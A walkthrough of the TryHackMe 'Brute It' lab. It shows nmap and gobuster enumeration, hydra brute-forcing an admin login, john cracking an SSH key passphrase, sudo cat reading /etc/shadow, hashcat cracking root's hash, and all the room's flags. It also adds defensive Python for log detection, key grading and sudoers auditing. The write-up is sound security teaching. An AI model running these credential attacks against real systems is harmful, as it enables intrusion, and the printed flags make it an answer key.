TryHackMe | Brute it writeup
This is one (of many) walkthroughs for the Brute It CTF room. As always, in this article I follow some simple enumeration steps to expose the potential flaws.
Reconnaissance
As usual, I use nmap to see which ports are open.
nmap -sC -sV $IP_ADDRESS
Starting Nmap 7.60 ( https://nmap.org ) at 2023-01-11 17:26 GMT
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
| 256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_ 256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:A2:02:F1:92:0F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.06 seconds
1. How many ports are open? 2
2. What version of SSH is running? OpenSSH 7.6p1
3. What version of Apache is running? 2.4.29
4. Which Linux distribution is running? Ubuntu
After opening the web server in a browser, I could not find any potential answer for the next question, so I used gobuster to brute-force directory and file names.
gobuster dir -u http://IP_ADDRESS -x html,py,txt,php,css -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://IP_ADDRESS
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,py,txt,php,css
[+] Timeout: 10s
===============================================================
2023/01/11 17:29:01 Starting gobuster
===============================================================
...
/admin (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/01/11 17:29:04 Finished
===============================================================
5. What is the hidden directory? /admin
Getting a shell
After accessing the /admin, I could see an administrator login panel asking for some credentials. By inspecting the HTML source code I found some goodies! 😺
Based on the hint of the next question and this information, I had everything needed to brute-force the password. This required a bit of research, as I was not aware of which hydra service to use. I found that the one needed was http-post-form. The http-post-form module needs, among other things, the endpoint that performs the authentication and the error message it should compare each response against to tell a failed attempt from a successful one.
Without further ado, the command executed was the following:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV $IP_ADDRESS http-post-form "/admin/:user=admin&pass=^PASS^:invalid"
...
[VERBOSE] Page redirected to http://10.10.203.245/admin/panel/
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "disney" - 523 of 14344398 [child 0] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "rabbit" - 524 of 14344398 [child 7] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "54321" - 525 of 14344398 [child 13] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "fashion" - 526 of 14344398 [child 14] (0/0)
[ATTEMPT] target $IP_ADDRESS - login "admin" - pass "soccer1" - 527 of 14344398 [child 15] (0/0)
[80][http-post-form] host: $IP_ADDRESS login: admin password: xavier
6. What is the user:password of the admin panel? admin:xavier
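The directory enumeration and the login brute force above both leave an obvious trace in the web server's access log: a burst of 404s from one client, followed by a stream of POSTs to the same login form. As an added defender-side example (not part of the original writeup), the Python below parses Apache combined-format log lines and flags a client that hits either pattern inside a short sliding window. The log lines, the client addresses and the thresholds are constructed for the example; the login path defaults to /admin/ because that is the form used in the room.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Fields of the Apache "combined" format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (not taken from the room): 203.0.113.5 first walks a
# wordlist (burst of 404s, one 301 for /admin), then hammers the login form;
# 198.51.100.7 is an ordinary visitor who mistypes one URL and logs in once.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jan/2023:17:29:01 +0000] "GET /cgi-bin/ HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:01 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:01 +0000] "GET /admin HTTP/1.1" 301 312 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:02 +0000] "GET /test.php HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:02 +0000] "GET /config.txt HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:02 +0000] "GET /old.html HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
203.0.113.5 - - [11/Jan/2023:17:29:03 +0000] "GET /uploads HTTP/1.1" 404 275 "-" "gobuster/3.0.1"
198.51.100.7 - - [11/Jan/2023:17:30:00 +0000] "GET /indexx.html HTTP/1.1" 404 275 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jan/2023:17:30:05 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:00 +0000] "POST /admin/ HTTP/1.1" 200 1035 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:00 +0000] "POST /admin/ HTTP/1.1" 200 1035 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:01 +0000] "POST /admin/ HTTP/1.1" 200 1035 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:01 +0000] "POST /admin/ HTTP/1.1" 200 1035 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:02 +0000] "POST /admin/ HTTP/1.1" 200 1035 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Jan/2023:17:31:02 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields the detector needs, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_abuse(lines, login_path="/admin/", window_s=60,
                 enum_threshold=5, brute_threshold=5):
    """Return sorted (ip, kind) pairs whose event count inside one sliding window reached the threshold."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    thresholds = {"directory enumeration": enum_threshold,
                  "login brute force": brute_threshold}
    recent = defaultdict(deque)  # (ip, kind) -> timestamps still inside the window
    findings = set()
    for e in events:
        if e["status"] == 404:
            kind = "directory enumeration"
        elif e["method"] == "POST" and e["path"].rstrip("/") == login_path.rstrip("/"):
            kind = "login brute force"
        else:
            continue
        hits = recent[(e["ip"], kind)]
        hits.append(e["ts"])
        while (e["ts"] - hits[0]).total_seconds() > window_s:
            hits.popleft()
        if len(hits) >= thresholds[kind]:
            findings.add((e["ip"], kind))
    return sorted(findings)


if __name__ == "__main__":
    for ip, kind in detect_abuse(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {kind}")
```

Note that the room's form answers a failed login with a 200 page containing "invalid" (that is what hydra matches on), so the brute-force rule counts POSTs to the login path rather than relying on 401/403 status codes. The same counters are the kind of signal a rate limiter or a fail2ban-style jail would act on; tune the window and thresholds against a baseline of your own traffic before alerting on them.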
After signing in to the administrator panel, a web flag and a username stood out on the screen. Quickly answered that one! 😄
The admin panel also pointed to an id_rsa private key. The next question required a few more steps. Thankfully, THM allowed me to learn a bit more about password cracking: john is an awesome tool for the job, and ssh2john converts the private key into a format john understands.
$ curl http://IP_ADDRESS/admin/panel/id_rsa > id_rsa
$ /opt/john/ssh2john.py id_rsa > hash
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Wait a few seconds to see the passphrase, which is the answer to the next question.
7. Crack the RSA key you found. What is John’s RSA Private Key passphrase? rockinroll
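The reason the passphrase falls in seconds is not only that it is in rockyou.txt: a key in the legacy PEM format is encrypted with a key derived from the passphrase by a single MD5 pass, so every guess is cheap, whereas the current OpenSSH format uses bcrypt with a configurable number of rounds. As an added defender-side example (not part of the original writeup), the Python below reads only the header of a private key, reports which format, cipher and KDF protect it, and grades the result. The sample keys are constructed in the block (their key material is dummy bytes; only the header fields are meaningful), and the ssh-keygen options in the messages are the standard -p (change passphrase), -o (new format) and -a (bcrypt rounds).

```python
import base64
import re
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH wire-format string (uint32 big-endian length prefix) from buf."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(text):
    """Return how (and whether) a PEM or OpenSSH private key protects its secret."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(ln for ln in text.splitlines() if not ln.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(raw, off)
        kdf, off = _read_string(raw, off)
        kdfopts, off = _read_string(raw, off)
        rounds = None
        if kdf == b"bcrypt":            # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: encryption is announced by two RFC 1421 headers.
    encrypted = "Proc-Type: 4,ENCRYPTED" in text
    m = re.search(r"^DEK-Info: ([A-Z0-9-]+),", text, re.M)
    return {"format": "pem", "encrypted": encrypted,
            "cipher": m.group(1) if m else "none",
            "kdf": "EVP_BytesToKey (MD5, 1 iteration)" if encrypted else "none",
            "rounds": 1 if encrypted else None}


def assess(info):
    """Turn the parsed header into a one-line risk statement."""
    if not info["encrypted"]:
        return "HIGH: key has no passphrase; anyone who can read the file can use it"
    if info["format"] == "pem":
        return ("MEDIUM: legacy PEM encryption derives the key with one MD5 pass, so "
                "passphrase guessing is cheap; re-encrypt with ssh-keygen -p -o -a 64")
    if info["rounds"] is not None and info["rounds"] < 16:
        return f"LOW: bcrypt with only {info['rounds']} rounds; raise with ssh-keygen -p -a 64"
    return f"OK: {info['cipher']} with bcrypt KDF, {info['rounds']} rounds"


# --- constructed samples (dummy key material, realistic headers) -------------

def _ssh_string(b):
    return struct.pack(">I", len(b)) + b


def make_openssh_sample(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Build a minimal openssh-key-v1 blob whose header carries the given protection."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    raw = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
           + struct.pack(">I", 1) + _ssh_string(b"dummy-public") + _ssh_string(b"dummy-private"))
    b64 = base64.b64encode(raw).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


LEGACY_PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

bm90IGEgcmVhbCBrZXkgYm9keSwganVzdCBmaWxsZXIgZm9yIHRoZSBleGFtcGxl
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for label, key in [("legacy pem", LEGACY_PEM_SAMPLE),
                       ("openssh, no passphrase", make_openssh_sample(b"none", b"none", 0)),
                       ("openssh, 16 rounds", make_openssh_sample())]:
        print(f"{label}: {assess(inspect_private_key(key))}")
```

Run it against real keys with `inspect_private_key(open(path).read())`. A key that grades MEDIUM is exactly the case ssh2john handles; converting it with ssh-keygen -p -o -a 64 keeps the same key pair but makes each passphrase guess cost a bcrypt run with 64 rounds instead of one MD5.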
You can now access the server through ssh. Remember that the private key file must be readable only by you, otherwise ssh refuses to use it.
$ chmod 600 id_rsa
$ ssh -i id_rsa john@IP_ADDRESS
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jan 11 18:13:58 UTC 2023
System load: 0.0 Processes: 104
Usage of /: 25.7% of 19.56GB Users logged in: 0
Memory usage: 20% IP address for eth0: 10.10.203.245
Swap usage: 0%
63 packages can be updated.
0 updates are security updates.
john@bruteit:~$
8. user.txt THM{a_password_is_not_a_barrier}
9. Web flag THM{brut3_f0rce_is_e4sy}
Privilege Escalation
The remainder of the CTF introduced some new challenges. The very first thing to do was to list the commands I was allowed to execute as root on behalf of john.
john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat
At this point, we can read the contents of any file, as we are able to run cat as root. With that in mind, let's try to read the content of the /etc/shadow file.
sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
...
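The whole escalation rests on one sudoers line, `john ALL=(root) NOPASSWD: /bin/cat`, which is what `sudo -l` printed above as `(root) NOPASSWD: /bin/cat`. Any binary that can be run as root with caller-chosen arguments and that copies a file to its output is equivalent to a read of /etc/shadow. As an added defender-side example (not part of the original writeup), the Python below parses sudoers-style rules and grades them: unrestricted `ALL`, file-reading binaries run as root with free arguments, and the milder case where sudo pins the arguments. The sample file and the short list of file-reading binaries are constructed for the example; extend the list from your own baseline.

```python
import re

# Binaries that, run as root with free arguments, hand back any file's contents.
# Constructed, deliberately short list for the example.
FILE_READ_BINARIES = {
    "cat", "tac", "less", "more", "head", "tail", "nl", "cut", "grep", "awk",
    "sed", "vi", "vim", "nano", "base64", "xxd", "cp", "tar", "zip",
}

# user  host = (runas) TAG: cmd, cmd ...   (runas and tags are optional)
SUDOERS_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sample sudoers (not the room's real file).
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
john    ALL=(root) NOPASSWD: /bin/cat                      # the Brute It rule
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(root) /usr/bin/tail /var/log/syslog
"""


def audit_sudoers(text):
    """Return (who, command, severity, reason) tuples for risky rules."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        # sudo runs as root when no runas list is given; "(user:group)" keeps the user part.
        runas = (m["runas"] or "root").split(":")[0]
        suffix = " without a password" if nopasswd else ""
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            words = cmd.split()
            if not words:
                continue
            name = words[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((m["who"], cmd, "HIGH" if nopasswd else "INFO",
                                 "unrestricted sudo" + suffix))
            elif name in FILE_READ_BINARIES and runas in ("root", "ALL"):
                if len(words) > 1:
                    findings.append((m["who"], cmd, "LOW",
                                     f"{name} as root, but sudo pins the arguments"))
                else:
                    findings.append((m["who"], cmd, "HIGH",
                                     f"{name} as root with free arguments reads any "
                                     f"file, /etc/shadow included{suffix}"))
    return findings


if __name__ == "__main__":
    for who, cmd, sev, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{sev:5} {who:8} {cmd:40} {why}")
```

Run it over the output of `sudo -l` rewritten as rules, or directly over /etc/sudoers and /etc/sudoers.d/* on a host you administer. The fix for the room's rule is to grant a wrapper script that reads the one file john actually needs, or to pin the arguments as the `backup` line does; the second lesson from this room is that even a root password hash should not be crackable in two seconds, so the audit belongs next to a password-policy check.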
We can copy the hash, from $6$ up to the next ":", into a file and try to crack it. This time, I used hashcat.
$ hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs
$6$zdk0.:football
...more hashcat output
10. Find a form to escalate your privileges. What is the root’s password? football
Well, nothing more to say. We can switch to root and extract the final piece of the puzzle.
$ su root
Password: football
root@bruteit:/bin# whoami
root
You can access the root folder and see the final flag.
11. root.txt THM{pr1v1l3g3_3sc4l4t10n}
Conclusion
Pretty cool room, to be honest! It was really great to try different tools to crack passwords (hydra, john, hashcat). Kudos to ReddyyZ for creating this one! 👍